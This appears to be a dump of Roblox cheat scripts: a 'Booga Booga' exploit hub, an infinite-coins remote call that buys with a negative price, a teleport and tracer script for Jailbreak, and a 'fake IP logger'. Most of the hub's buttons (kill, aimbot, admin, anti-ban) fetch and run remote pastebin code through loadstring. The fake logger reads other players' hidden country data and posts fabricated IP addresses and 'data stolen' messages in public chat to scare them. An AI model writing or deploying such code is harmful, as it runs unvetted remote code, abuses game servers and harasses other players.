Fram.Style = Enum.FrameStyle.RobloxRound 199 | Fram.Draggable = true 200 | 201 | 202 | Namegui.Name = "Namegui" 203 | Namegui.Parent = Fram 204 | Namegui.BackgroundColor3 = Color3.new(0.188235, 0.188235, 0.188235) 205 | Namegui.Position = UDim2.new(0.00464427564, 0, 0.0519442223, 0) 206 | Namegui.Size = UDim2.new(0, 392, 0, 50) 207 | Namegui.Font = Enum.Font.Cartoon 208 | Namegui.Text = "BOOGA KUY HUB V2" 209 | Namegui.TextColor3 = Color3.new(0.811765, 0.811765, 0.811765) 210 | Namegui.TextScaled = true 211 | Namegui.TextSize = 14 212 | Namegui.TextStrokeColor3 = Color3.new(1, 1, 1) 213 | Namegui.TextWrapped = true 214 | 215 | 216 | mainframe.Name = "mainframe" 217 | mainframe.Parent = Fram 218 | mainframe.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118) 219 | mainframe.Position = UDim2.new(0.00144155091, 0, 0.18895106, 0) 220 | mainframe.Size = UDim2.new(0, 392, 0, 299) 221 | 222 | 223 | RAINBOW.Name = "RAINBOW" 224 | RAINBOW.Parent = Fram 225 | RAINBOW.BackgroundColor3 = Color3.new(0, 0.666667, 1) 226 | RAINBOW.Position = UDim2.new(0.027227724, 0, 0.409299195, 0) 227 | RAINBOW.Size = UDim2.new(0, 182, 0, 50) 228 | RAINBOW.Font = Enum.Font.GothamBlack 229 | RAINBOW.Text = "[PATCHED] FRAM" 230 | RAINBOW.TextColor3 = Color3.new(0, 0, 0) 231 | RAINBOW.TextScaled = true 232 | RAINBOW.TextSize = 14 233 | RAINBOW.TextWrapped = true 234 | 235 | 236 | BoogaBitchV2.Name = "BoogaBitchV2" 237 | BoogaBitchV2.Parent = Fram 238 | BoogaBitchV2.BackgroundColor3 = Color3.new(1, 0, 0) 239 | BoogaBitchV2.BorderColor3 = Color3.new(1, 0.333333, 0) 240 | BoogaBitchV2.Position = UDim2.new(0.511923075, 0, 0.243334323, 0) 241 | BoogaBitchV2.Size = UDim2.new(0, 178, 0, 51) 242 | BoogaBitchV2.Font = Enum.Font.GothamBlack 243 | BoogaBitchV2.Text = "BOOGABITCHEDV2" 244 | BoogaBitchV2.TextColor3 = Color3.new(0, 0, 0) 245 | BoogaBitchV2.TextScaled = true 246 | BoogaBitchV2.TextSize = 14 247 | BoogaBitchV2.TextWrapped = true 248 | 249 | 250 | ADMIN.Name = "ADMIN" 251 | ADMIN.Parent = Fram 252 | ADMIN.BackgroundColor3 = Color3.new(1, 0, 0) 253 | ADMIN.Position = UDim2.new(0.00474983267, 0, 0.925426841, 0) 254 | ADMIN.Size = UDim2.new(0, 187, 0, 28) 255 | ADMIN.Text = "become Admin" 256 | ADMIN.TextColor3 = Color3.new(0, 0, 0) 257 | ADMIN.TextScaled = true 258 | ADMIN.TextSize = 14 259 | ADMIN.TextWrapped = true 260 | 261 | 262 | BBG.Name = "BBG" 263 | BBG.Parent = Fram 264 | BBG.BackgroundColor3 = Color3.new(1, 0, 0) 265 | BBG.Position = UDim2.new(0.0257123131, 0, 0.732394934, 0) 266 | BBG.Size = UDim2.new(0, 182, 0, 50) 267 | BBG.Font = Enum.Font.GothamBlack 268 | BBG.Text = "BBG" 269 | BBG.TextColor3 = Color3.new(0, 0, 0) 270 | BBG.TextScaled = true 271 | BBG.TextSize = 14 272 | BBG.TextWrapped = true 273 | 274 | 275 | BoogaFucker.Name = "BoogaFucker" 276 | BoogaFucker.Parent = Fram 277 | BoogaFucker.BackgroundColor3 = Color3.new(1, 0, 0.0156863) 278 | BoogaFucker.Position = UDim2.new(0.514586031, 0, 0.410867006, 0) 279 | BoogaFucker.Size = UDim2.new(0, 177, 0, 50) 280 | BoogaFucker.Modal = true 281 | BoogaFucker.Font = Enum.Font.GothamBlack 282 | BoogaFucker.Text = "BoogaFucker" 283 | BoogaFucker.TextColor3 = Color3.new(0, 0, 0) 284 | BoogaFucker.TextScaled = true 285 | BoogaFucker.TextSize = 14 286 | BoogaFucker.TextWrapped = true 287 | 288 | 289 | Exit.Name = "Exit" 290 | Exit.Parent = Fram 291 | Exit.BackgroundColor3 = Color3.new(1, 0, 0) 292 | Exit.Position = UDim2.new(0.924366713, 0, -0.0199115053, 0) 293 | Exit.Size = UDim2.new(0, 37, 0, 20) 294 | Exit.Font = Enum.Font.SourceSans 295 | Exit.Text = "X" 296 | Exit.TextColor3 = Color3.new(0, 0, 0) 297 | Exit.TextScaled = true 298 | Exit.TextSize = 14 299 | Exit.TextWrapped = true 300 | Exit.MouseButton1Click:connect(function() 301 | Fram.Visible = false 302 | mainframe.Visible = false 303 | Frame.Visible = false 304 | RAINBOW.Visible = false 305 | Open.Visible = true 306 | end) 307 | 308 | 309 | OnyxHUB.Name = "OnyxHUB" 310 | OnyxHUB.Parent = Fram 311 | OnyxHUB.BackgroundColor3 = Color3.new(1, 0, 0) 312 | OnyxHUB.Position = UDim2.new(0.513195515, 0, 0.732822478, 0) 313 | OnyxHUB.Size = UDim2.new(0, 177, 0, 50) 314 | OnyxHUB.Font = Enum.Font.GothamBlack 315 | OnyxHUB.Text = "OnyxHUB" 316 | OnyxHUB.TextColor3 = Color3.new(0, 0, 0) 317 | OnyxHUB.TextScaled = true 318 | OnyxHUB.TextSize = 14 319 | OnyxHUB.TextWrapped = true 320 | 321 | 322 | Rainbow.Name = "Rainbow" 323 | Rainbow.Parent = Fram 324 | Rainbow.BackgroundColor3 = Color3.new(0.309804, 0.309804, 0.309804) 325 | Rainbow.Position = UDim2.new(0.00271650776, 0, 0.875051558, 0) 326 | Rainbow.Size = UDim2.new(0, 389, 0, 21) 327 | 328 | 329 | BYPASS2.Name = "BYPASS2" 330 | BYPASS2.Parent = Fram 331 | BYPASS2.BackgroundColor3 = Color3.new(0, 1, 1) 332 | BYPASS2.Position = UDim2.new(0.477137923, 0, 0.924601436, 0) 333 | BYPASS2.Size = UDim2.new(0, 200, 0, 27) 334 | BYPASS2.Text = "FE-ANTIBAN - EN" 335 | BYPASS2.TextColor3 = Color3.new(0, 0, 0) 336 | BYPASS2.TextSize = 14 337 | 338 | 339 | Frame.Parent = Fram 340 | Frame.BackgroundColor3 = Color3.new(0.105882, 0.105882, 0.105882) 341 | Frame.Position = UDim2.new(0.00204570964, 0, 0.188230529, 0) 342 | Frame.Size = UDim2.new(0, 392, 0, 14) 343 | 344 | 345 | MOJOCRAFT.Name = "MOJO CRAFT" 346 | MOJOCRAFT.Parent = Fram 347 | MOJOCRAFT.BackgroundColor3 = Color3.new(1, 1, 0) 348 | MOJOCRAFT.BorderColor3 = Color3.new(1, 1, 0.498039) 349 | MOJOCRAFT.Position = UDim2.new(0.0350364782, 0, 0.243633732, 0) 350 | MOJOCRAFT.Size = UDim2.new(0, 178, 0, 50) 351 | MOJOCRAFT.Font = Enum.Font.GothamBlack 352 | MOJOCRAFT.Text = "MOJO CRAFT" 353 | MOJOCRAFT.TextColor3 = Color3.new(0.203922, 0.203922, 0) 354 | MOJOCRAFT.TextScaled = true 355 | MOJOCRAFT.TextSize = 14 356 | MOJOCRAFT.TextWrapped = true 357 | 358 | 359 | FEKILL.Name = "FEKILL" 360 | FEKILL.Parent = Fram 361 | FEKILL.BackgroundColor3 = Color3.new(1, 0, 0) 362 | FEKILL.Position = UDim2.new(0.0246204603, 0, 0.570873439, 0) 363 | FEKILL.Size = UDim2.new(0, 182, 0, 50) 364 | FEKILL.Font = Enum.Font.GothamBlack 365 | FEKILL.Text = "[ OP ] FE KILL V2" 366 | FEKILL.TextColor3 = Color3.new(0, 0, 0) 367 | FEKILL.TextScaled = true 368 | FEKILL.TextSize = 14 369 | FEKILL.TextWrapped = true 370 | 371 | 372 | aimbot.Name = "aimbot" 373 | aimbot.Parent = Fram 374 | aimbot.BackgroundColor3 = Color3.new(0, 1, 0) 375 | aimbot.Position = UDim2.new(0.512886941, 0, 0.571486533, 0) 376 | aimbot.Size = UDim2.new(0, 177, 0, 50) 377 | aimbot.Font = Enum.Font.GothamBlack 378 | aimbot.Text = "AIMBOT HACK" 379 | aimbot.TextColor3 = Color3.new(0, 0, 0) 380 | aimbot.TextScaled = true 381 | aimbot.TextSize = 14 382 | aimbot.TextWrapped = true 383 | 384 | 385 | GUIMADEBYPEEMAIGAMERTV.Name = "GUI MADE BY PEEMAI GAMERTV" 386 | GUIMADEBYPEEMAIGAMERTV.Parent = Fram 387 | GUIMADEBYPEEMAIGAMERTV.BackgroundColor3 = Color3.new(1, 0, 0.0156863) 388 | GUIMADEBYPEEMAIGAMERTV.Position = UDim2.new(0.00736166537, 0, 0.866602778, 0) 389 | GUIMADEBYPEEMAIGAMERTV.Size = UDim2.new(0, 387, 0, 25) 390 | GUIMADEBYPEEMAIGAMERTV.Font = Enum.Font.GothamBlack 391 | GUIMADEBYPEEMAIGAMERTV.Text = "GUI MADE BY PEEMAI GAMERTV" 392 | GUIMADEBYPEEMAIGAMERTV.TextColor3 = Color3.new(0, 0, 0) 393 | GUIMADEBYPEEMAIGAMERTV.TextScaled = true 394 | GUIMADEBYPEEMAIGAMERTV.TextSize = 14 395 | GUIMADEBYPEEMAIGAMERTV.TextWrapped = true 396 | 397 | 398 | FUCKYOU.Name = "FUCK YOU" 399 | FUCKYOU.Parent = Fram 400 | FUCKYOU.BackgroundColor3 = Color3.new(1, 1, 1) 401 | FUCKYOU.Position = UDim2.new(0.000137096271, 0, -0.00371993612, 0) 402 | FUCKYOU.Size = UDim2.new(0, 200, 0, 24) 403 | FUCKYOU.Font = Enum.Font.GothamBlack 404 | FUCKYOU.Text = "COPYRIGHT 2019 - BOOGA BOOGA GUI" 405 | FUCKYOU.TextColor3 = Color3.new(0, 0, 0) 406 | FUCKYOU.TextScaled = true 407 | FUCKYOU.TextSize = 14 408 | FUCKYOU.TextWrapped = true 409 | 410 | 411 | ANTIBAN.Name = "ANTIBAN" 412 | ANTIBAN.Parent = StartGui 413 | ANTIBAN.BackgroundColor3 = Color3.new(1, 1, 1) 414 | ANTIBAN.Position = UDim2.new(0.455414027, 0, 0.00157481513, 0) 415 | ANTIBAN.Size = UDim2.new(0, 207, 0, 18) 416 | ANTIBAN.Visible = false 417 | 418 | 419 | Antiban.Name = "Antiban?" 420 | Antiban.Parent = ANTIBAN 421 | Antiban.BackgroundColor3 = Color3.new(0.262745, 0.262745, 0.262745) 422 | Antiban.Position = UDim2.new(-0.00326965633, 0, -0.0103235245, 0) 423 | Antiban.Size = UDim2.new(0, 208, 0, 19) 424 | Antiban.Font = Enum.Font.GothamBlack 425 | Antiban.Text = "ANTI BAN V.1 - ON" 426 | Antiban.TextColor3 = Color3.new(1, 0, 0.0156863) 427 | Antiban.TextScaled = true 428 | Antiban.TextSize = 14 429 | Antiban.TextWrapped = true 430 | 431 | 432 | -- Scripts: 433 | MOJOCRAFT.MouseButton1Down:connect(function() 434 | loadstring(game:HttpGet("https://pastebin.com/raw/NPc9MFnL", true))() 435 | end) 436 | 437 | OnyxHUB.MouseButton1Down:connect(function() 438 | loadstring(game:HttpGet("https://pastebin.com/raw/T4CMx3vi", true))() 439 | end) 440 | 441 | BoogaBitchV2.MouseButton1Down:connect(function() 442 | loadstring(game:HttpGet("https://pastebin.com/raw/yigKxDrK", true))() 443 | end) 444 | 445 | craftgui.MouseButton1Down:connect(function() 446 | loadstring(game:HttpGet("https//https://pastebin.com/raw/spgZDKr2", true))() 447 | end) 448 | 449 | BoogaFucker.MouseButton1Down:connect(function() 450 | loadstring(game:HttpGet("https://pastebin.com/raw/ML0bP1A7", true))() 451 | end) 452 | 453 | FEKILL.MouseButton1Down:connect(function() 454 | loadstring(game:HttpGet("https://pastebin.com/raw/43u4BPx8", true))() 455 | end) 456 | 457 | aimbot.MouseButton1Down:connect(function() 458 | loadstring(game:HttpGet("https://pastebin.com/raw/KJzGu42u", true))() 459 | end) 460 | 461 | ADMIN.MouseButton1Down:connect(function() 462 | loadstring(game:HttpGet("https://pastebin.com/raw/nLGnSxt1", true))() 463 | end) 464 | -------------------------------------------------------------------------------- /Build a boat Farm: -------------------------------------------------------------------------------- 1 | -- Auto Updating Loadstring 2 | loadstring(game:HttpGet("https://pastebin.com/raw/AfW5fuDS", true))() 3 | -------------------------------------------------------------------------------- /Infinite Coins: -------------------------------------------------------------------------------- 1 | game.Players.LocalPlayer.RemoteFunctions.SwordShopSystem:FireServer("Buy", -9999999, "Frostbrand") 2 | -------------------------------------------------------------------------------- /Ip Logger Fake: -------------------------------------------------------------------------------- 1 | -- Gui to Lua 2 | -- Version: 3.2 3 | 4 | -- Instances: 5 | 6 | local ScreenGui = Instance.new("ScreenGui") 7 | local Frame = Instance.new("ImageLabel") 8 | local TextLabel = Instance.new("TextLabel") 9 | local TextLabel_2 = Instance.new("TextLabel") 10 | local close = Instance.new("TextButton") 11 | local TextLabel_3 = Instance.new("TextLabel") 12 | local TextLabel_4 = Instance.new("TextLabel") 13 | local username = Instance.new("TextBox") 14 | local snatch = Instance.new("TextButton") 15 | local TextButton_Roundify_12px = Instance.new("ImageLabel") 16 | local miscbut = Instance.new("TextButton") 17 | local MISC = Instance.new("ImageLabel") 18 | local TextLabel_5 = Instance.new("TextLabel") 19 | local TextLabel_6 = Instance.new("TextLabel") 20 | local snatchall = Instance.new("TextButton") 21 | local TextButton_Roundify_12px_2 = Instance.new("ImageLabel") 22 | local TextLabel_7 = Instance.new("TextLabel") 23 | Frame.Draggable = true 24 | Frame.Active = true 25 | Frame.Selectable = true 26 | local sound = Instance.new("Sound") 27 | sound.Parent = workspace 28 | sound.SoundId = "rbxassetid://5292029547" 29 | sound:Play() 30 | 31 | --Properties: 32 | 33 | ScreenGui.Parent = game.CoreGui 34 | 35 | Frame.Name = "Frame" 36 | Frame.Parent = ScreenGui 37 | Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 38 | Frame.BackgroundTransparency = 1.000 39 | Frame.Position = UDim2.new(0.152727276, 0, 0.277641267, 0) 40 | Frame.Size = UDim2.new(0, 0, 0, 0) 41 | Frame.ZIndex = 3 42 | Frame.Image = "rbxassetid://3570695787" 43 | Frame.ImageColor3 = Color3.fromRGB(20, 20, 20) 44 | Frame.ScaleType = Enum.ScaleType.Slice 45 | Frame.SliceCenter = Rect.new(100, 100, 100, 100) 46 | Frame.SliceScale = 0.120 47 | Frame.ClipsDescendants = true 48 | 49 | TextLabel.Parent = Frame 50 | TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 51 | TextLabel.BackgroundTransparency = 1.000 52 | TextLabel.Position = UDim2.new(0.026143793, 0, 0.0232558139, 0) 53 | TextLabel.Size = UDim2.new(0, 22, 0, 24) 54 | TextLabel.ZIndex = 3 55 | TextLabel.Font = Enum.Font.SourceSansBold 56 | TextLabel.Text = "IP" 57 | TextLabel.TextColor3 = Color3.fromRGB(255, 85, 0) 58 | TextLabel.TextSize = 25.000 59 | 60 | TextLabel_2.Parent = Frame 61 | TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 62 | TextLabel_2.BackgroundTransparency = 1.000 63 | TextLabel_2.Position = UDim2.new(0.0980392173, 0, 0.0232558139, 0) 64 | TextLabel_2.Size = UDim2.new(0, 102, 0, 24) 65 | TextLabel_2.ZIndex = 3 66 | TextLabel_2.Font = Enum.Font.SourceSansBold 67 | TextLabel_2.Text = "LOGGER" 68 | TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255) 69 | TextLabel_2.TextSize = 25.000 70 | 71 | close.Name = "close" 72 | close.Parent = Frame 73 | close.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 74 | close.BackgroundTransparency = 1.010 75 | close.Position = UDim2.new(0.934640527, 0, 0.0232558139, 0) 76 | close.Size = UDim2.new(0, 20, 0, 20) 77 | close.ZIndex = 3 78 | close.Font = Enum.Font.SourceSansBold 79 | close.Text = "X" 80 | close.TextColor3 = Color3.fromRGB(255, 0, 0) 81 | close.TextScaled = true 82 | close.TextSize = 14.000 83 | close.TextWrapped = true 84 | 85 | TextLabel_3.Parent = Frame 86 | TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 87 | TextLabel_3.BackgroundTransparency = 1.000 88 | TextLabel_3.Position = UDim2.new(7.4505806e-09, 0, 0.860465109, 0) 89 | TextLabel_3.Size = UDim2.new(0, 214, 0, 24) 90 | TextLabel_3.ZIndex = 3 91 | TextLabel_3.Font = Enum.Font.SourceSansBold 92 | TextLabel_3.Text = "Gui & Code Remade: fixed#8267" 93 | TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255) 94 | TextLabel_3.TextSize = 15.000 95 | 96 | TextLabel_4.Parent = Frame 97 | TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 98 | TextLabel_4.BackgroundTransparency = 1.000 99 | TextLabel_4.Position = UDim2.new(0, 0, 0.767441869, 0) 100 | TextLabel_4.Size = UDim2.new(0, 240, 0, 24) 101 | TextLabel_4.ZIndex = 3 102 | TextLabel_4.Font = Enum.Font.SourceSansBold 103 | TextLabel_4.Text = "Gui & Code Revamp: Univrs#7207" 104 | TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255) 105 | TextLabel_4.TextSize = 15.000 106 | 107 | username.Name = "username" 108 | username.Parent = Frame 109 | username.BackgroundColor3 = Color3.fromRGB(255, 128, 0) 110 | username.BackgroundTransparency = 1.000 111 | username.BorderSizePixel = 0 112 | username.Position = UDim2.new(0.173202619, 0, 0.313953489, 0) 113 | username.Size = UDim2.new(0, 200, 0, 24) 114 | username.ZIndex = 3 115 | username.Font = Enum.Font.GothamBold 116 | username.PlaceholderColor3 = Color3.fromRGB(178, 178, 178) 117 | username.PlaceholderText = "Input User" 118 | username.Text = "" 119 | username.TextColor3 = Color3.fromRGB(255, 255, 255) 120 | username.TextSize = 14.000 121 | 122 | snatch.Name = "LogFakeIp" 123 | snatch.Parent = Frame 124 | snatch.BackgroundColor3 = Color3.fromRGB(255, 128, 0) 125 | snatch.BackgroundTransparency = 1.000 126 | snatch.BorderSizePixel = 0 127 | snatch.Position = UDim2.new(0.205882356, 0, 0.511627913, 0) 128 | snatch.Size = UDim2.new(0, 180, 0, 28) 129 | snatch.ZIndex = 4 130 | snatch.Font = Enum.Font.SourceSansBold 131 | snatch.Text = "Take Ip" 132 | snatch.TextColor3 = Color3.fromRGB(255, 255, 255) 133 | snatch.TextScaled = true 134 | snatch.TextSize = 14.000 135 | snatch.TextWrapped = true 136 | snatch.MouseButton1Down:connect(function() 137 | local v = game.Players[username.Text] 138 | ass = gethiddenproperty or get_hidden_prop 139 | local Thing = game:GetService("HttpService"):JSONDecode(game:HttpGet("http://country.io/names.json")) 140 | local ParsedCountry = Thing[ass(v, "CountryRegionCodeReplicate")] 141 | local SayMessageRequest1 = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest 142 | SayMessageRequest1:FireServer( 143 | v.Name.." - Cracking IP Address...", 144 | "All" 145 | ) 146 | wait(2) 147 | local SayMessageRequest = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest 148 | SayMessageRequest:FireServer( 149 | v.Name.." is from "..tostring(ParsedCountry).." OS: "..v.OsPlatform.." IP: "..math.random(836).."."..math.random(725).."."..math.random(99)..".".."##".." ".."(IP: Successfully Logged)", 150 | "All" 151 | ) 152 | wait(0.55) 153 | local SayMessageRequest2 = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest 154 | SayMessageRequest2:FireServer( 155 | v.Name.."'s Data Has Been Successfully Stolen.", 156 | "All" 157 | ) 158 | 159 | end) 160 | 161 | TextButton_Roundify_12px.Name = "TextButton_Roundify_12px" 162 | TextButton_Roundify_12px.Parent = snatch 163 | TextButton_Roundify_12px.Active = true 164 | TextButton_Roundify_12px.AnchorPoint = Vector2.new(0.5, 0.5) 165 | TextButton_Roundify_12px.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 166 | TextButton_Roundify_12px.BackgroundTransparency = 1.000 167 | TextButton_Roundify_12px.Position = UDim2.new(0.5, 0, 0.5, 0) 168 | TextButton_Roundify_12px.Selectable = true 169 | TextButton_Roundify_12px.Size = UDim2.new(1, 0, 1, 0) 170 | TextButton_Roundify_12px.ZIndex = 3 171 | TextButton_Roundify_12px.Image = "rbxassetid://3570695787" 172 | TextButton_Roundify_12px.ImageColor3 = Color3.fromRGB(255, 128, 0) 173 | TextButton_Roundify_12px.ScaleType = Enum.ScaleType.Slice 174 | TextButton_Roundify_12px.SliceCenter = Rect.new(100, 100, 100, 100) 175 | TextButton_Roundify_12px.SliceScale = 0.120 176 | 177 | miscbut.Name = "miscbut" 178 | miscbut.Parent = Frame 179 | miscbut.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 180 | miscbut.BackgroundTransparency = 1.010 181 | miscbut.Position = UDim2.new(0.934640527, 0, 0.883720934, 0) 182 | miscbut.Size = UDim2.new(0, 20, 0, 20) 183 | miscbut.ZIndex = 3 184 | miscbut.Font = Enum.Font.SourceSansBold 185 | miscbut.Text = ">" 186 | miscbut.TextColor3 = Color3.fromRGB(255, 255, 255) 187 | miscbut.TextScaled = true 188 | miscbut.TextSize = 14.000 189 | miscbut.TextWrapped = true 190 | 191 | MISC.Name = "MISC" 192 | MISC.Parent = Frame 193 | MISC.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 194 | MISC.BackgroundTransparency = 1.000 195 | MISC.Position = UDim2.new(0.0775638819, 0, 0.0725949258, 0) 196 | MISC.Size = UDim2.new(0, 262, 0, 147) 197 | MISC.ZIndex = 0 198 | MISC.Image = "rbxassetid://3570695787" 199 | MISC.ImageColor3 = Color3.fromRGB(20, 20, 20) 200 | MISC.ScaleType = Enum.ScaleType.Slice 201 | MISC.SliceCenter = Rect.new(100, 100, 100, 100) 202 | MISC.SliceScale = 0.120 203 | 204 | TextLabel_5.Parent = MISC 205 | TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 206 | TextLabel_5.BackgroundTransparency = 1.000 207 | TextLabel_5.Position = UDim2.new(0.02614378, 0, 0.0232981984, 0) 208 | TextLabel_5.Size = UDim2.new(0, 18, 0, 20) 209 | TextLabel_5.Font = Enum.Font.SourceSansBold 210 | TextLabel_5.Text = "MI" 211 | TextLabel_5.TextColor3 = Color3.fromRGB(255, 85, 0) 212 | TextLabel_5.TextSize = 25.000 213 | 214 | TextLabel_6.Parent = MISC 215 | TextLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 216 | TextLabel_6.BackgroundTransparency = 1.000 217 | TextLabel_6.Position = UDim2.new(0.0980392322, 0, 0.0232981984, 0) 218 | TextLabel_6.Size = UDim2.new(0, 28, 0, 20) 219 | TextLabel_6.Font = Enum.Font.SourceSansBold 220 | TextLabel_6.Text = "SC" 221 | TextLabel_6.TextColor3 = Color3.fromRGB(255, 255, 255) 222 | TextLabel_6.TextSize = 25.000 223 | 224 | snatchall.Name = "logserver" 225 | snatchall.Parent = MISC 226 | snatchall.BackgroundColor3 = Color3.fromRGB(255, 128, 0) 227 | snatchall.BackgroundTransparency = 1.000 228 | snatchall.BorderSizePixel = 0 229 | snatchall.Position = UDim2.new(0.0493937507, 0, 0.703036785, 0) 230 | snatchall.Size = UDim2.new(0, 236, 0, 23) 231 | snatchall.ZIndex = 2 232 | snatchall.Font = Enum.Font.SourceSansBold 233 | snatchall.Text = "Log Server" 234 | snatchall.TextColor3 = Color3.fromRGB(255, 255, 255) 235 | snatchall.TextScaled = true 236 | snatchall.TextSize = 14.000 237 | snatchall.TextWrapped = true 238 | snatchall.MouseButton1Down:connect(function() 239 | --[[https://v3rmillion.net/showthread.php?tid=1012504, In-Chat Player Real Country Fake IP leaker by kuraga. 240 | ]] 241 | -- CREDITS TO kuraga#4659 AND DerzeTT#8830 242 | ass = gethiddenproperty or get_hidden_prop 243 | 244 | for _,v in pairs(game:GetService("Players"):GetPlayers()) do 245 | if v.Name ~= game:GetService("Players").LocalPlayer.Name then 246 | local Thing = game:GetService("HttpService"):JSONDecode(game:HttpGet("http://country.io/names.json")) 247 | local ParsedCountry = Thing[ass(v, "CountryRegionCodeReplicate")] 248 | local SayMessageRequest = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest 249 | SayMessageRequest:FireServer( 250 | v.Name.." is from "..tostring(ParsedCountry).." OS: "..v.OsPlatform.." IP: "..math.random(728).."."..math.random(326).."."..math.random(99)..".".."##".." ".."(IP: Successfully Logged)", 251 | "All" 252 | ) 253 | wait(2) 254 | end 255 | end 256 | for i = 1,5 do 257 | local SayMessageRequest1 = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest 258 | SayMessageRequest1:FireServer( 259 | "Program Status: Cracking...", 260 | "All" 261 | ) 262 | wait(1) 263 | end 264 | wait(5) 265 | local SayMessageRequest2 = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest 266 | SayMessageRequest2:FireServer( 267 | "Program Status: Successfully Stolen Addresses, Data Being Sold To [%Encryped Site%]", 268 | "All" 269 | ) 270 | end) 271 | 272 | TextButton_Roundify_12px_2.Name = "TextButton_Roundify_12px" 273 | TextButton_Roundify_12px_2.Parent = snatchall 274 | TextButton_Roundify_12px_2.Active = true 275 | TextButton_Roundify_12px_2.AnchorPoint = Vector2.new(0.5, 0.5) 276 | TextButton_Roundify_12px_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 277 | TextButton_Roundify_12px_2.BackgroundTransparency = 1.000 278 | TextButton_Roundify_12px_2.Position = UDim2.new(0.5, 0, 0.5, 0) 279 | TextButton_Roundify_12px_2.Selectable = true 280 | TextButton_Roundify_12px_2.Size = UDim2.new(1, 0, 1, 0) 281 | TextButton_Roundify_12px_2.Image = "rbxassetid://3570695787" 282 | TextButton_Roundify_12px_2.ImageColor3 = Color3.fromRGB(255, 128, 0) 283 | TextButton_Roundify_12px_2.ScaleType = Enum.ScaleType.Slice 284 | TextButton_Roundify_12px_2.SliceCenter = Rect.new(100, 100, 100, 100) 285 | TextButton_Roundify_12px_2.SliceScale = 0.120 286 | 287 | TextLabel_7.Parent = MISC 288 | TextLabel_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 289 | TextLabel_7.BackgroundTransparency = 1.000 290 | TextLabel_7.Position = UDim2.new(0.0980392322, 0, 0.213774383, 0) 291 | TextLabel_7.Size = UDim2.new(0, 212, 0, 62) 292 | TextLabel_7.Font = Enum.Font.SourceSansBold 293 | TextLabel_7.Text = "Holy fuck some people are annoying" 294 | TextLabel_7.TextColor3 = Color3.fromRGB(255, 255, 255) 295 | TextLabel_7.TextScaled = true 296 | TextLabel_7.TextSize = 25.000 297 | TextLabel_7.TextWrapped = true 298 | 299 | -- Scripts: 300 | 301 | local function XHSJL_fake_script() -- close.LocalScript 302 | local script = Instance.new('LocalScript', close) 303 | 304 | close.MouseButton1Down:Connect(function() 305 | MISC:TweenPosition(UDim2.new(0.078, 0, 0.073, 0), 'Out', 'Bounce', 0.35) 306 | wait(.35) 307 | Frame.ClipsDescendants = true 308 | Frame:TweenSize(UDim2.new(0,0,0,0), 'Out', 'Linear', .3) 309 | wait(.3) 310 | ScreenGui:Destroy() 311 | end) 312 | end 313 | coroutine.wrap(XHSJL_fake_script)() 314 | local function MOOLDA_fake_script() -- miscbut.LocalScript 315 | local script = Instance.new('LocalScript', miscbut) 316 | 317 | local t = false 318 | miscbut.MouseButton1Down:Connect(function() 319 | if (t == false) then 320 | MISC:TweenPosition(UDim2.new(1.051, 0, 0.073, 0), 'Out', 'Bounce', 0.35) 321 | wait(.35) 322 | t = true 323 | elseif (t == true) then 324 | MISC:TweenPosition(UDim2.new(0.078, 0, 0.073, 0), 'Out', 'Bounce', 0.35) 325 | wait(.35) 326 | t = false 327 | end 328 | end) 329 | end 330 | coroutine.wrap(MOOLDA_fake_script)() 331 | Frame:TweenSize(UDim2.new(0, 306, 0, 172), 'Out', 'Linear', 0.3) 332 | wait(.3) 333 | Frame.ClipsDescendants = false 334 | -------------------------------------------------------------------------------- /JailBreak Best Script Gui: -------------------------------------------------------------------------------- 1 | local plr = game:GetService("Players").LocalPlayer 2 | 3 | local TpMethod = 2 4 | 5 | function JailbreakTp(...) 6 | getfenv()["TpMethod" .. TpMethod](...) 7 | end 8 | 9 | function TpMethod1(...) 10 | local char = plr.Character 11 | local root = char.HumanoidRootPart 12 | local args = {...} 13 | for i=0,1,0.05 do 14 | wait() 15 | root.CFrame = root.CFrame:lerp(CFrame.new(unpack(args,1,3)), i) 16 | end 17 | end 18 | 19 | function TpMethod2(...) 20 | local args = {...} 21 | local char = plr.Character 22 | local target = Vector3.new(unpack(args,1,3)) 23 | local dist = (char:WaitForChild"HumanoidRootPart".Position - target).magnitude 24 | dist = math.floor(dist / 100) + 1 25 | for i=0,dist * 4 do 26 | wait() 27 | char:MoveTo(Vector3.new(...)) 28 | end 29 | if args[#args] == true then 30 | wait() 31 | char:WaitForChild'HumanoidRootPart'.CFrame = CFrame.new(unpack(args,1,#args - 1)) 32 | end 33 | end 34 | 35 | function Tween(obj, t, properties) 36 | local TweenService = game:GetService("TweenService") 37 | local tweenInfo = TweenInfo.new(t,Enum.EasingStyle.Linear,Enum.EasingDirection.In,0,false,0) 38 | local tween = TweenService:Create(obj,tweenInfo,properties) 39 | tween:Play() 40 | return tween 41 | end 42 | 43 | local Tracers = {} 44 | 45 | local function AddLasso(p,team) 46 | if not Tracers[team.Name] then return end 47 | if p == plr then return end 48 | spawn(function() 49 | if p.Character then 50 | local l = Instance.new("SelectionPartLasso") 51 | l.Parent = p.Character 52 | l.Humanoid = p.Character:FindFirstChildOfClass"Humanoid" 53 | l.Part = plr.Character:WaitForChild"HumanoidRootPart" 54 | l.Visible = true 55 | l.Color3 = 